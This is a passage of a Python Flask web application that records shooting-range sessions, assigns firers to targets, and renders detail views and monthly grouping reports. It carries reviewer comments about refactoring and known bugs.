                   .order_by(Shooting_Session.datetimestamp.desc())
                   .all())
    selection = TGroup.query.distinct(TGroup.group_no).filter(TGroup.date == curdate).all()
    return render_template('pages/auto_setup.html',
                           data=selection, data_2=selection_2, form=form)
@app.route('/auto_setup_1/')
def auto_setup_1():
    """Render the alternate automatic detail-setup page.

    Unlike /auto_setup/, the group list is NOT restricted to today's date.
    """
    # Fix: dropped the unused local `drop=[]` from the original.
    curdate = time.strftime("%Y-%m-%d")
    form = BulkRegistrationForm()
    selection_2 = (Shooting_Session.query
                   .filter(Shooting_Session.date >= curdate)
                   .order_by(Shooting_Session.datetimestamp.desc())
                   .all())
    selection = TGroup.query.distinct(TGroup.group_no).all()
    return render_template('pages/auto_setup_1.html',
                           data=selection, data_2=selection_2, form=form)
@app.route('/group_gen/',methods=['GET', 'POST'])
def group_gen():
    """Return the eight target service ids of a selected group as JSON.

    POST: body is ``{"data": <group_no>}``; the group number is remembered
    in the Flask session (read later by the /FRAS_1/ handler) and the
    group's target_1_no..target_8_no are returned as data1..data8.
    GET: returns data1..data8 all null (matches the original behavior).
    """
    # Fix: the original spelled out da_1..da_8 by hand; collapse the
    # eight-fold copy-paste into a loop over the attribute names.
    targets = [None] * 8
    if request.method == "POST":
        payload = request.get_json()
        group = payload['data']
        session['group'] = group  # remembered for the auto-setup flow
        row = TGroup.query.filter(TGroup.group_no == group).scalar()
        targets = [getattr(row, 'target_%d_no' % i) for i in range(1, 9)]
    return jsonify(**{'data%d' % i: t for i, t in enumerate(targets, start=1)})
@app.route('/detail_exitence_1/',methods=['GET', 'POST'])
def detail_exitence_1():
    """Activate an existing session detail as the live (TShooting) detail.

    POST body: ``{"data": <detail_no>}``. Copies the matching Session_Detail
    row into the singleton TShooting table (delete-then-insert), then returns
    the first target's shooter info plus that shooter's last five grouping
    results, MPI tendencies, and grouping lengths as JSON.
    """
    ra_1=None
    da_1=None
    detail=None
    service_id_1=None
    # NOTE(review): this local deliberately-or-accidentally shadows the
    # flask `session` imported at module top — confirm before refactoring.
    session=None
    paper=None
    set_no=None
    cant=None
    if request.method == "POST":
        data = request.get_json()
        detail=data['data']
        dt=time.strftime("%Y-%m-%d")
        # `data` is rebound from the JSON payload to the DB row here.
        data=db.session.query(Session_Detail).filter(Session_Detail.detail_no==detail).scalar()
        # TShooting is treated as a one-row "currently live detail" table:
        # clear it, then insert the chosen detail. Order matters.
        db.session.query(TShooting).delete()
        db.session.commit()
        Tdetail_shots =TShooting(
            date=datetime.now(),
            datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
            session_id=data.session_id,
            detail_no=data.detail_no,
            target_1_id=data.target_1_id,
            target_2_id=data.target_2_id,
            target_3_id=data.target_3_id,
            target_4_id=data.target_4_id,
            target_5_id=data.target_5_id,
            target_6_id=data.target_6_id,
            target_7_id=data.target_7_id,
            target_8_id=data.target_8_id,
            paper_ref=data.paper_ref,
            set_no=data.set_no,
            save_flag=0
        )
        db.session.add(Tdetail_shots)
        db.session.commit()
        # Last five records each, oldest-first ([::-1] reverses the
        # descending-timestamp query results).
        res=[]
        ten=[]
        gp_len=[]
        tten=db.session.query(MPI.tendency_code).filter(MPI.firer_id==data.target_1_id).order_by(MPI.datetimestamp.desc()).limit(5).all()[::-1]
        tres = db.session.query(Grouping.result).filter(Grouping.firer_id==data.target_1_id).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
        tgp = db.session.query(Grouping.grouping_length_f).filter(Grouping.firer_id==data.target_1_id).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
        # Each query returns 1-tuples; flatten them into plain lists.
        for ele in tres:
            for ele2 in ele:
                res.append(ele2)
        for ele3 in tten:
            for ele4 in ele3:
                ten.append(ele4)
        for ele5 in tgp:
            for ele6 in ele5:
                gp_len.append(ele6)
        # Display fields for target 1's shooter.
        da_1=db.session.query(Shooter.name).filter(Shooter.id==data.target_1_id).scalar()
        cant_id=db.session.query(Shooter.cantonment_id).filter(Shooter.id==data.target_1_id).scalar()
        cant=db.session.query(Cantonment.cantonment).filter(Cantonment.id==cant_id).scalar()
        ra_1_id=db.session.query(Shooter.rank_id).filter(Shooter.id==data.target_1_id).scalar()
        ra_1 = db.session.query(Rank.name).filter(Rank.id==ra_1_id).scalar()
        session=db.session.query(TShooting.session_id).scalar()
        paper=db.session.query(TShooting.paper_ref).scalar()
        set_no=db.session.query(TShooting.set_no).scalar()
        service_id_1 = db.session.query(Shooter.service_id).filter(Shooter.id==data.target_1_id).scalar()
        return jsonify(
            data1=da_1,
            ra_1=ra_1,
            detail=detail,
            service_id_1=service_id_1,
            session=session,
            paper=paper,
            set_no=set_no,
            cant=cant,
            res=res,
            ten=ten,
            gp_len=gp_len
        )
@app.route('/generate_ref/' ,methods=['GET', 'POST'])
def generate_ref():
    """Return the current paper reference number as JSON ``{"gen": int}``.

    POST body ``{"data": "New"}`` yields 0 (start a new paper); any other
    value yields the stored TPaper_ref.paper_ref.
    """
    # Fix: the original initialized g=None, so a plain GET crashed on
    # int(None). Default to 0 instead so GET answers {"gen": 0}.
    g = 0
    if request.method == "POST":
        data = request.get_json()
        paper_ref = data['data']
        if paper_ref == 'New':
            g = 0
        else:
            obj = TPaper_ref.query.scalar()
            g = obj.paper_ref
    return jsonify(gen=int(g))
@app.route('/create_detail_target_2/', methods=['GET', 'POST'])
def create_detail_target_2():
    """Render the target-2 detail-entry page.

    Supplies the live TShooting row and all shooter service ids for the
    firer picker.
    """
    # Fix: dropped the unused local `curdate` from the original.
    service_ids = [shooter.service_id for shooter in Shooter.query.all()]
    detail_data = TShooting.query.scalar()
    return render_template('pages/create_detail_target_2.html',
                           detail_data=detail_data,
                           firer_1=service_ids
                           )
@app.route('/save_target_2/', methods=['GET', 'POST'])
def save_target_2():
    """Assign the posted shooter (form field ``tag``) to target 2.

    Updates both the persistent Session_Detail row and the live TShooting
    row, then redirects to the target-2 score page.
    """
    service_id = request.form['tag']
    shooter = Shooter.query.filter(Shooter.service_id == service_id).scalar()
    shooter_id = shooter.id
    detail_row = Session_Detail.query.first()
    detail_row.target_2_id = shooter_id
    db.session.commit()
    live_row = TShooting.query.first()
    live_row.target_2_id = shooter_id
    db.session.commit()
    return redirect(url_for('individual_score_target_2'))
@app.route('/create_detail_target_1/', methods=['GET', 'POST'])
def create_detail_target_1():
    """Render the target-1 detail-entry page.

    Supplies today's shooting sessions and all shooter service ids for the
    firer picker.
    """
    today = time.strftime("%Y-%m-%d")
    todays_sessions = Shooting_Session.query.filter(Shooting_Session.date == today).all()
    service_ids = [shooter.service_id for shooter in Shooter.query.all()]
    return render_template('pages/create_detail_target_1.html',
                           data=todays_sessions,
                           firer_1=service_ids
                           )
@app.route('/create_session/', methods=['GET', 'POST'])
def create_session():
    """Create a new Shooting_Session from the session form.

    Resolves the selected range/firearm/ammunition names to their ids
    (999 sentinel when nothing is selected), saves the session on a valid
    submit, and otherwise re-renders the form with its dropdown data.
    """
    try:
        data = Shooter.query.all()
        rang= Range.query.all()
        firearms = Firearms.query.all()
        ammunation = Ammunation.query.all()
        rang_name = request.form.get('comp_select_4')
        fire_name = request.form.get('comp_select_5')
        ammu_name = request.form.get('comp_select_6')
        form=SessionForm()
        # 999 is the project-wide "not selected" sentinel id.
        if(rang_name is None):
            range_id=999
            fire_id=999
            ammu_id=999
        else:
            range_id = db.session.query(Range.id).filter(Range.name==rang_name).scalar()
            fire_id = db.session.query(Firearms.id).filter(Firearms.name==fire_name).scalar()
            ammu_id = db.session.query(Ammunation.id).filter(Ammunation.name==ammu_name).scalar()
        if form.validate_on_submit():
            shooting=Shooting_Session(
                date=form.date.data.strftime('%Y-%m-%d'),
                datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
                shooting_range_id=range_id,
                firearms_id=fire_id,
                ammunation_id=ammu_id,
                target_distance = form.target_distance.data,
                weather_notes = form.weather_notes.data,
                comments = form.comments.data,
                session_no=form.session_no.data,
                occasion=form.occ.data
            )
            db.session.add(shooting)
            db.session.commit()
            return redirect(url_for('create_detail_target_1'))
    except Exception as e:
        # NOTE(review): url_for() expects an endpoint name, but
        # 'error5_505.html' looks like a template name — this redirect will
        # itself raise BuildError. Confirm the intended error endpoint.
        return redirect(url_for('error5_505.html'))
    return render_template('forms/shooting_form.html', form=form, data =data ,rang=rang , firearmns=firearms, ammunation = ammunation)
@app.route('/monthly_report/',methods=['GET','POST'])
def monthly_report():
    """Render the monthly grouping/MPI report.

    POST: the selected month name (form field ``comp_select``) is combined
    with the current year to form an inclusive date range, and matching
    Grouping/MPI rows are rendered. GET renders an empty report page.
    Any unknown month name falls back to December, matching the original
    if/elif chain's final ``else`` branch.
    """
    from calendar import monthrange  # stdlib; used for the month's last day

    month_numbers = {
        'January': 1, 'February': 2, 'March': 3, 'April': 4,
        'May': 5, 'June': 6, 'July': 7, 'August': 8,
        'September': 9, 'October': 10, 'November': 11, 'December': 12,
    }
    month = None
    try:
        if request.method == 'POST':
            month = request.form.get('comp_select')
            year = datetime.now().year
            # Fix: the original repeated this whole block twelve times and
            # hard-coded '-02-28', silently dropping Feb 29 in leap years;
            # monthrange() gives the true last day.
            mnum = month_numbers.get(month, 12)
            last_day = monthrange(year, mnum)[1]
            date_start = datetime.strptime('%d-%02d-01' % (year, mnum), "%Y-%m-%d")
            date_end = datetime.strptime('%d-%02d-%02d' % (year, mnum, last_day), "%Y-%m-%d")
            # Fix: the original wrote `Shooter.rank_id==Rank.id and
            # Grouping.date==MPI.date` — a Python `and` between SQLAlchemy
            # clauses, which does not produce a SQL AND; both conditions are
            # now separate filter arguments (implicit AND).
            dat1 = db.session.query(
                Grouping.date, Shooter.service_id, Rank.name,
                Shooter.name.label('firer'), Shooter.unit, Shooter.brigade,
                Grouping.detail_no, Grouping.result,
                Grouping.grouping_length_f, MPI.tendency_text,
            ).filter(
                Grouping.date.between(date_start, date_end),
                Grouping.firer_id == Shooter.id,
                Shooter.rank_id == Rank.id,
                Grouping.date == MPI.date,
                Grouping.session_id == MPI.session_id,
                Grouping.firer_id == MPI.firer_id,
                Grouping.detail_no == MPI.detail_no,
                Grouping.target_no == MPI.target_no,
                Grouping.spell_no == MPI.spell_no,
                Grouping.paper_ref == MPI.paper_ref,
            ).all()
            return render_template('pages/monthly_report.html', dat1=dat1, month=month)
    except Exception as e:
        return render_template('errors/month_session.html')
    return render_template('pages/monthly_report.html')
@app.route('/save_target_1/', methods=['GET', 'POST'])
def save_target_1():
    """Save a detail with only target 1 assigned (targets 2-8 = sentinel 999).

    Writes the detail to the persistent Session_Detail table, refreshes the
    singleton TPaper_ref row, and (re)creates the live TShooting row. The
    two branches differ only in whether the TShooting table must be cleared
    first; the delete-then-insert ordering inside each branch is significant.
    """
    ref_1=None
    try:
        if request.method == 'POST':
            detail_no = request.form['game_id_1']
            r=request.form['tag']
            r_object=Shooter.query.filter(Shooter.service_id==r).scalar()
            r_id=r_object.id
            # 999 = project-wide "no firer on this target" sentinel.
            r2_id=999
            r3_id=999
            r4_id=999
            r5_id=999
            r6_id=999
            r7_id=999
            r8_id=999
            ref=request.form['business']
            set_no = request.form.get('comp_select_6')
            shots = request.form['tag_8']
            sess=request.form.get('comp_select')
            ref_1 = None
            # Empty paper-ref field means "reuse the stored reference".
            paper=db.session.query(TPaper_ref).scalar()
            if(ref == ""):
                ref_1=paper.paper_ref
            else:
                ref_1=ref
            temp_shooting=db.session.query(TShooting).scalar()
            if(temp_shooting is None):
                # No live detail yet: insert Session_Detail, refresh
                # TPaper_ref, then create the live TShooting row.
                detail_shots =Session_Detail(
                    date=datetime.now(),
                    datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
                    session_id=sess,
                    detail_no=detail_no,
                    target_1_id=r_id,
                    target_2_id=r2_id,
                    target_3_id=r3_id,
                    target_4_id=r4_id,
                    target_5_id=r5_id,
                    target_6_id=r6_id,
                    target_7_id=r7_id,
                    target_8_id=r8_id,
                    paper_ref=ref_1,
                    set_no=set_no,
                    save_flag=0
                )
                db.session.add(detail_shots)
                db.session.commit()
                db.session.query(TPaper_ref).delete()
                db.session.commit()
                ref_db = TPaper_ref(
                    paper_ref=ref_1,
                    detail_no=detail_no,
                    session_no=sess
                )
                db.session.add(ref_db)
                db.session.commit()
                Tdetail_shots =TShooting(
                    date=datetime.now(),
                    datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
                    session_id=sess,
                    detail_no=detail_no,
                    target_1_id=r_id,
                    target_2_id=r2_id,
                    target_3_id=r3_id,
                    target_4_id=r4_id,
                    target_5_id=r5_id,
                    target_6_id=r6_id,
                    target_7_id=r7_id,
                    target_8_id=r8_id,
                    paper_ref=ref_1,
                    set_no=set_no,
                    save_flag=0
                )
                db.session.add(Tdetail_shots)
                db.session.commit()
            else:
                # A live detail exists: clear TShooting and TPaper_ref
                # before re-inserting everything.
                db.session.query(TShooting).delete()
                db.session.commit()
                db.session.query(TPaper_ref).delete()
                db.session.commit()
                ref_db = TPaper_ref(
                    paper_ref=ref_1,
                    detail_no=detail_no,
                    session_no=sess
                )
                db.session.add(ref_db)
                db.session.commit()
                detail_shots =Session_Detail(
                    date=datetime.now(),
                    datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
                    session_id=sess,
                    detail_no=detail_no,
                    target_1_id=r_id,
                    target_2_id=r2_id,
                    target_3_id=r3_id,
                    target_4_id=r4_id,
                    target_5_id=r5_id,
                    target_6_id=r6_id,
                    target_7_id=r7_id,
                    target_8_id=r8_id,
                    paper_ref=ref_1,
                    set_no=set_no,
                    save_flag=0
                )
                db.session.add(detail_shots)
                db.session.commit()
                Tdetail_shots =TShooting(
                    date=datetime.now(),
                    datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
                    session_id=sess,
                    detail_no=detail_no,
                    target_1_id=r_id,
                    target_2_id=r2_id,
                    target_3_id=r3_id,
                    target_4_id=r4_id,
                    target_5_id=r5_id,
                    target_6_id=r6_id,
                    target_7_id=r7_id,
                    target_8_id=r8_id,
                    paper_ref=ref_1,
                    set_no=set_no,
                    save_flag=0
                )
                db.session.add(Tdetail_shots)
                db.session.commit()
    except Exception as e:
        return redirect(url_for('error_target_1'))
    return redirect(url_for('individual_score_target_1'))
@app.route('/FRAS/', methods=['GET', 'POST'])
def load ():
    """Register a full eight-target shooting detail from the manual form.

    Resolves each posted service id to a Shooter id (empty field -> sentinel
    999), validates the set number and checks for duplicate firers, refreshes
    the singleton TPaper_ref row, and writes both the live TShooting row and
    the persistent Session_Detail row. On success redirects to the
    image-processing page; on any exception redirects to the error page.
    """
    try:
        ref_1=None
        if request.method == 'POST':
            detail_no = request.form['game_id_1']
            tmp_list = []
            duplicate = False
            # Resolve the eight target fields; 999 = "no firer".
            r=request.form['tag']
            if (r== ""):
                r_id = 999
            else:
                r_object=Shooter.query.filter(Shooter.service_id==r).scalar()
                r_id=r_object.id
            r1=request.form['tag_1']
            if(r1== ""):
                r1_id=999
            else:
                r1_object=Shooter.query.filter(Shooter.service_id==r1).scalar()
                r1_id=r1_object.id
            r2=request.form['tag_2']
            if (r2==""):
                r2_id=999
            else:
                r2_object=Shooter.query.filter(Shooter.service_id==r2).scalar()
                r2_id=r2_object.id
            r3=request.form['tag_3']
            if(r3==""):
                r3_id=999
            else:
                r3_object=Shooter.query.filter(Shooter.service_id==r3).scalar()
                r3_id=r3_object.id
            r4=request.form['tag_4']
            if(r4==""):
                r4_id=999
            else:
                r4_object=Shooter.query.filter(Shooter.service_id==r4).scalar()
                r4_id=r4_object.id
            r5=request.form['tag_5']
            if(r5==""):
                r5_id=999
            else:
                r5_object=Shooter.query.filter(Shooter.service_id==r5).scalar()
                r5_id=r5_object.id
            r6=request.form['tag_6']
            if(r6==""):
                r6_id=999
            else:
                r6_object=Shooter.query.filter(Shooter.service_id==r6).scalar()
                r6_id=r6_object.id
            r7=request.form['tag_7']
            if(r7== ""):
                r7_id=999
            else:
                r7_object=Shooter.query.filter(Shooter.service_id==r7).scalar()
                r7_id=r7_object.id
            ref=request.form['business']
            set_no = request.form.get('comp_select_6')
            shots = request.form['tag_8']
            # NOTE(review): this local `sess` shadows the module-level TF
            # session of the same name — confirm before renaming either.
            sess=request.form.get('comp_select')
            tmp_list.append(r_id)
            tmp_list.append(r1_id)
            tmp_list.append(r2_id)
            tmp_list.append(r3_id)
            tmp_list.append(r4_id)
            tmp_list.append(r5_id)
            tmp_list.append(r6_id)
            tmp_list.append(r7_id)
            # Empty paper ref -> reuse the stored TPaper_ref value.
            if ref == None or ref =="":
                ref_obj=TPaper_ref.query.scalar()
                ref_1=ref_obj.paper_ref
            else :
                print("Inside ref _4 else")
                ref_1=ref
                print(ref_1)
                print("Inside ref _4 else 1")
            # A paper holds at most 5 sets.
            if(int(set_no)>5):
                print("Inside ref _5 else")
                return redirect(url_for('paper_duplicate_error'))
            else:
                print("Inside TPaper_ref")
                db.session.query(TPaper_ref).delete()
                print("Inside TPaper_ref")
                db.session.commit()
                ref_db = TPaper_ref(
                    paper_ref=ref_1,
                    detail_no=detail_no,
                    session_no=sess
                )
                db.session.add(ref_db)
                db.session.commit()
                print("Inside load 3")
            # Pairwise duplicate-firer check; pairs of 999 sentinels are
            # exempt. Note: no break, so the last comparison wins.
            for i in range(len(tmp_list)):
                for j in range(len(tmp_list)):
                    if(tmp_list[i]== 999 and tmp_list[j]==999):
                        duplicate = False
                    elif(i!=j and tmp_list[i]==tmp_list[j]):
                        duplicate = True
                        print("temp1")
            if(duplicate):
                return redirect(url_for('duplicate_firer_error'))
            else:
                print("temp")
                temp=db.session.query(TShooting.save_flag).scalar()
                print(temp)
                if(temp is None):
                    # No live detail: create TShooting then Session_Detail.
                    print("Inside the temp if")
                    print(sess)
                    print(detail_no)
                    Tdetail_shots =TShooting(
                        date=datetime.now(),
                        datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
                        session_id=sess,
                        detail_no=detail_no,
                        target_1_id=r_id,
                        target_2_id=r1_id,
                        target_3_id=r2_id,
                        target_4_id=r3_id,
                        target_5_id=r4_id,
                        target_6_id=r5_id,
                        target_7_id=r6_id,
                        target_8_id=r7_id,
                        paper_ref=ref_1,
                        set_no=set_no,
                        save_flag=0
                    )
                    print(Tdetail_shots)
                    print("Tdetail_shots")
                    db.session.add(Tdetail_shots)
                    db.session.commit()
                    print(""
                    )
                    detail_shots =Session_Detail(
                        date=datetime.now(),
                        datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
                        session_id=sess,
                        detail_no=detail_no,
                        target_1_id=r_id,
                        target_2_id=r1_id,
                        target_3_id=r2_id,
                        target_4_id=r3_id,
                        target_5_id=r4_id,
                        target_6_id=r5_id,
                        target_7_id=r6_id,
                        target_8_id=r7_id,
                        paper_ref=ref_1,
                        set_no=set_no,
                        save_flag=0
                    )
                    db.session.add(detail_shots)
                    db.session.commit()
                else:
                    # Live detail exists: clear TShooting first, then
                    # recreate both rows.
                    db.session.query(TShooting).filter(TShooting.id != 999).delete()
                    db.session.commit()
                    Tdetail_shots =TShooting(
                        date=datetime.now(),
                        datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
                        session_id=sess,
                        detail_no=detail_no,
                        target_1_id=r_id,
                        target_2_id=r1_id,
                        target_3_id=r2_id,
                        target_4_id=r3_id,
                        target_5_id=r4_id,
                        target_6_id=r5_id,
                        target_7_id=r6_id,
                        target_8_id=r7_id,
                        paper_ref=ref_1,
                        set_no=set_no,
                        save_flag=0
                    )
                    db.session.add(Tdetail_shots)
                    db.session.commit()
                    detail_shots =Session_Detail(
                        date=datetime.now(),
                        datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
                        session_id=sess,
                        detail_no=detail_no,
                        target_1_id=r_id,
                        target_2_id=r1_id,
                        target_3_id=r2_id,
                        target_4_id=r3_id,
                        target_5_id=r4_id,
                        target_6_id=r5_id,
                        target_7_id=r6_id,
                        target_8_id=r7_id,
                        paper_ref=ref_1,
                        set_no=set_no,
                        save_flag=0
                    )
                    db.session.add(detail_shots)
                    db.session.commit()
    except Exception as e:
        print(e)
        return redirect(url_for('error_2'))
    return redirect(url_for('image_process'))
@app.route('/FRAS_1/', methods=['GET', 'POST'])
def load_1():
    """Create a new shooting detail from the currently selected group.

    On POST: resolves the eight target service numbers of the session's
    group to Shooter ids (999 marks an empty lane), replaces the single
    TPaper_ref row, rejects a set number above 5 or duplicate firers, and
    writes the detail to both Session_Detail (history) and TShooting
    (live table).  Redirects to 'detail_view' on success, to an error
    page otherwise.
    """
    ref_1 = None
    try:
        if request.method == 'POST':
            detail_no = request.form['game_id_1']
            gr = session.get('group', None)
            data = TGroup.query.filter(TGroup.group_no == gr).scalar()
            # Resolve the eight lane service numbers to Shooter ids;
            # an empty lane is stored as the sentinel id 999.
            ids = []
            for lane in range(1, 9):
                service_no = getattr(data, 'target_%d_no' % lane)
                if service_no == "":
                    ids.append(999)
                else:
                    shooter = Shooter.query.filter(
                        Shooter.service_id == service_no).scalar()
                    ids.append(shooter.id)
            ref = request.form['business']
            set_no = request.form.get('comp_select_6')
            shots = request.form['tag_8']
            sess = request.form.get('comp_select')
            # Fall back to the stored paper reference when none was typed.
            if ref is None or ref == "":
                ref_obj = TPaper_ref.query.scalar()
                ref_1 = ref_obj.paper_ref
            else:
                ref_1 = ref
            # Retained from the original: raises (-> error page) when no
            # reference row exists yet.
            check = TPaper_ref.query.scalar()
            cses = check.session_no
            det = check.detail_no
            if int(set_no) > 5:
                return redirect(url_for('paper_duplicate_error'))
            # TPaper_ref holds exactly one row: replace it wholesale.
            db.session.query(TPaper_ref).delete()
            db.session.commit()
            ref_db = TPaper_ref(
                paper_ref=ref_1,
                detail_no=detail_no,
                session_no=sess
            )
            db.session.add(ref_db)
            db.session.commit()
            # A detail is invalid when two occupied lanes share a firer;
            # the 999 sentinel may repeat freely.  (The original nested-loop
            # version could reset the flag back to False when a 999/999
            # pair was visited after a real duplicate.)
            duplicate = any(
                ids[i] == ids[j] and ids[i] != 999
                for i in range(len(ids))
                for j in range(len(ids))
                if i != j
            )
            if duplicate:
                return redirect(url_for('duplicate_firer_error'))
            # Identical column values are written to both tables.
            record = dict(
                date=datetime.now(),
                datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
                session_id=sess,
                detail_no=detail_no,
                target_1_id=ids[0],
                target_2_id=ids[1],
                target_3_id=ids[2],
                target_4_id=ids[3],
                target_5_id=ids[4],
                target_6_id=ids[5],
                target_7_id=ids[6],
                target_8_id=ids[7],
                paper_ref=ref_1,
                set_no=set_no,
                save_flag=0
            )
            temp_shooting = db.session.query(TShooting).scalar()
            if temp_shooting is None:
                db.session.add(Session_Detail(**record))
                db.session.commit()
                db.session.add(TShooting(**record))
                db.session.commit()
            else:
                # Clear the live table (the id-999 placeholder row stays)
                # before inserting the fresh detail.
                db.session.query(TShooting).filter(TShooting.id != 999).delete()
                db.session.commit()
                db.session.add(TShooting(**record))
                db.session.commit()
                db.session.add(Session_Detail(**record))
                db.session.commit()
    except Exception as e:
        print(e)  # log the cause; the user only sees the error page
        return redirect(url_for('error_102'))
    return redirect(url_for('detail_view'))
@app.route('/FRAS_2/', methods=['GET', 'POST'])
def load_2():
    """Create a new shooting detail from the currently selected group.

    Same workflow as load_1, but redirects to 'image_process' on success
    and to 'error' on failure.  On POST: resolves the eight target service
    numbers to Shooter ids (999 marks an empty lane), replaces the single
    TPaper_ref row, rejects a set number above 5 or duplicate firers, and
    writes the detail to both Session_Detail and TShooting.
    """
    ref_1 = None
    try:
        if request.method == 'POST':
            detail_no = request.form['game_id_1']
            gr = session.get('group', None)
            data = TGroup.query.filter(TGroup.group_no == gr).scalar()
            # Resolve the eight lane service numbers to Shooter ids;
            # an empty lane is stored as the sentinel id 999.
            ids = []
            for lane in range(1, 9):
                service_no = getattr(data, 'target_%d_no' % lane)
                if service_no == "":
                    ids.append(999)
                else:
                    shooter = Shooter.query.filter(
                        Shooter.service_id == service_no).scalar()
                    ids.append(shooter.id)
            ref = request.form['business']
            set_no = request.form.get('comp_select_6')
            shots = request.form['tag_8']
            sess = request.form.get('comp_select')
            # Fall back to the stored paper reference when none was typed.
            if ref is None or ref == "":
                ref_obj = TPaper_ref.query.scalar()
                ref_1 = ref_obj.paper_ref
            else:
                ref_1 = ref
            # Retained from the original: raises (-> error page) when no
            # reference row exists yet.
            check = TPaper_ref.query.scalar()
            cses = check.session_no
            det = check.detail_no
            if int(set_no) > 5:
                return redirect(url_for('paper_duplicate_error'))
            # TPaper_ref holds exactly one row: replace it wholesale.
            db.session.query(TPaper_ref).delete()
            db.session.commit()
            ref_db = TPaper_ref(
                paper_ref=ref_1,
                detail_no=detail_no,
                session_no=sess
            )
            db.session.add(ref_db)
            db.session.commit()
            # A detail is invalid when two occupied lanes share a firer;
            # the 999 sentinel may repeat freely.  (The original nested-loop
            # version could reset the flag back to False when a 999/999
            # pair was visited after a real duplicate.)
            duplicate = any(
                ids[i] == ids[j] and ids[i] != 999
                for i in range(len(ids))
                for j in range(len(ids))
                if i != j
            )
            if duplicate:
                return redirect(url_for('duplicate_firer_error'))
            # Identical column values are written to both tables.
            record = dict(
                date=datetime.now(),
                datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
                session_id=sess,
                detail_no=detail_no,
                target_1_id=ids[0],
                target_2_id=ids[1],
                target_3_id=ids[2],
                target_4_id=ids[3],
                target_5_id=ids[4],
                target_6_id=ids[5],
                target_7_id=ids[6],
                target_8_id=ids[7],
                paper_ref=ref_1,
                set_no=set_no,
                save_flag=0
            )
            temp_shooting = db.session.query(TShooting).scalar()
            if temp_shooting is None:
                db.session.add(Session_Detail(**record))
                db.session.commit()
                db.session.add(TShooting(**record))
                db.session.commit()
            else:
                # Clear the live table (the id-999 placeholder row stays)
                # before inserting the fresh detail.
                db.session.query(TShooting).filter(TShooting.id != 999).delete()
                db.session.commit()
                db.session.add(TShooting(**record))
                db.session.commit()
                db.session.add(Session_Detail(**record))
                db.session.commit()
    except Exception as e:
        print(e)
        return redirect(url_for('error'))
    return redirect(url_for('image_process'))
@app.route('/detail_view/', methods=['GET', 'POST'])
def detail_view():
    """List every stored detail, attaching the Shooter row for each lane."""
    records = Session_Detail.query.all()
    for record in records:
        # Resolve target_1_id..target_8_id into target_1..target_8.
        for lane in range(1, 9):
            shooter_id = getattr(record, 'target_%d_id' % lane)
            resolved = Shooter.query.filter(Shooter.id == shooter_id).scalar()
            setattr(record, 'target_%d' % lane, resolved)
    return render_template('pages/detail_view.html', detail=records)
@app.route('/detail_view/detail/<id>', methods=['GET', 'POST'])
def view_detail(id):
    """Show one detail (by primary key), attaching each lane's Shooter row."""
    rows = Session_Detail.query.filter(Session_Detail.id == id)
    for row in rows:
        # Resolve target_1_id..target_8_id into target_1..target_8.
        for lane in range(1, 9):
            shooter_id = getattr(row, 'target_%d_id' % lane)
            resolved = Shooter.query.filter(Shooter.id == shooter_id).scalar()
            setattr(row, 'target_%d' % lane, resolved)
    return render_template('pages/detail_view_id.html', data=rows)
@app.route('/detail_view/edit/<id>', methods=['GET', 'POST'])
def view_detail_edit(id):
    """Edit an existing Session_Detail row and mirror it into the live tables.

    On a valid POST the detail row is updated, the single TPaper_ref row is
    replaced, and - unless the live TShooting row is flagged as saved - the
    TShooting table is rebuilt from the submitted data.  On GET the form is
    pre-populated from the stored detail.  Any failure renders the detail
    error page.
    """
    try:
        detail = Session_Detail.query.filter(Session_Detail.id == id).first()
        form = DetailEditForm(obj=detail)
        if form.validate_on_submit():
            # Resolve each submitted service number to its Shooter id.
            targets = []
            for n in range(1, 9):
                service = getattr(form, 'target_%d_service' % n).data
                shooter = Shooter.query.filter(
                    Shooter.service_id == service).scalar()
                targets.append(shooter.id)
            # Reject details where two occupied lanes share one firer;
            # 999 is the empty-lane sentinel and may repeat freely.  (The
            # original nested loop could reset the flag after a real match
            # when it later visited a 999/999 pair.)
            duplicate = any(
                targets[i] == targets[j] and targets[i] != 999
                for i in range(len(targets))
                for j in range(len(targets))
                if i != j
            )
            if duplicate:
                return redirect(url_for('duplicate_firer_error'))
            detail.date = form.date.data
            detail.session_id = form.session_id.data
            detail.detail_no = form.detail_no.data
            detail.paper_ref = form.paper_ref.data
            detail.set_no = form.set_no.data
            for n in range(1, 9):
                setattr(detail, 'target_%d_id' % n, targets[n - 1])
            db.session.commit()
            # TPaper_ref holds exactly one row: replace it wholesale.
            db.session.query(TPaper_ref).delete()
            db.session.commit()
            ref_edit = TPaper_ref(
                paper_ref=form.paper_ref.data,
                detail_no=form.detail_no.data,
                session_no=form.session_id.data
            )
            db.session.add(ref_edit)
            db.session.commit()
            temp_shooting = db.session.query(TShooting).scalar()
            # NOTE(review): raises AttributeError (-> error page) when the
            # live table is empty; the original behaved the same way.
            if temp_shooting.save_flag == 1:
                return redirect(url_for('data_save'))
            # Clear the live table (the id-999 placeholder row stays) and
            # insert the edited detail.
            db.session.query(TShooting).filter(TShooting.id != 999).delete()
            db.session.commit()
            Tdetail_edit = TShooting(
                date=form.date.data,
                datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
                session_id=form.session_id.data,
                detail_no=form.detail_no.data,
                target_1_id=targets[0],
                target_2_id=targets[1],
                target_3_id=targets[2],
                target_4_id=targets[3],
                target_5_id=targets[4],
                target_6_id=targets[5],
                target_7_id=targets[6],
                target_8_id=targets[7],
                paper_ref=form.paper_ref.data,
                set_no=form.set_no.data,
                save_flag=0
            )
            db.session.add(Tdetail_edit)
            db.session.commit()
            return redirect(url_for('detail_view'))
        # GET (or invalid POST): pre-populate the form from the stored row.
        form.date.data = detail.date
        form.session_id.data = detail.session_id
        form.detail_no.data = detail.detail_no
        form.paper_ref.data = detail.paper_ref
        form.set_no.data = detail.set_no
        for n in range(1, 9):
            shooter = Shooter.query.filter(
